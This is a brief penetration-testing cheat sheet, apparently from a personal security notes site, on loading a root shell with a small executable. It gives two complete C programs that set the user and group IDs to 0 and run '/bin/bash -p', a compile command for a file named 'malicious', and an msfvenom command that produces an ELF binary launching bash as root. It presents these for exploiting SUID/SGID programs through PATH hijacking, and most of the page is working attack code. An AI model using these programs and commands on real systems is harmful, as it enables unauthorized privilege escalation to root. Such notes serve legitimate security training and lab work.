How to load a shell with a simple executable

Adapted from slyth11907 / Cheatsheets / Cheatsheet_QuickCShell.

It’s actually trivial to write a C program that loads up a shell.

#include <stdio.h>
#include <unistd.h>
 
main() {
	setuid(0);
	setgid(0);
	execl("/bin/bash",
	      "/bin/bash",
	      "-p",
	      (char*) NULL);
}

Alternate approach:

#include <stdio.h>
#include <time.h>
 
main() {
	setresuid(0, 0, 0);
	setregid(0, 0, 0);
	system("/bin/bash -p");
	return 0;
}

Compile with:

gcc -fPIC -o /path/to/malicious /path/to/malicious.c

Note that this is almost identical to the LD_PRELOAD trick; the primary differences are:

Use main() instead of _init() as our entry point.
Compile without -shared and -nostartfiles.

A simple binary like this is useful for exploiting SUID/SGID applications that call other executables from part of the PATH that we control.

Remember that the -p flag is required to keep Bash from dropping privileges!

Using Metasploit

How to use msfvenom to generate a binary that launches any command as root
Metasploit’s msfvenom tool can generate binaries that launch any command as root (useful for exploiting SUID/SGID applications that call other executables from part of the PATH that we control).
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf \
         -o shell.elf
Remember that the -p flag is required to keep Bash from dropping privileges!

Link to original

Cardboard Iguana Security

Explorer

How to load a shell with a simple executable

Using Metasploit

How to use msfvenom to generate a binary that launches any command as root

Graph View

Backlinks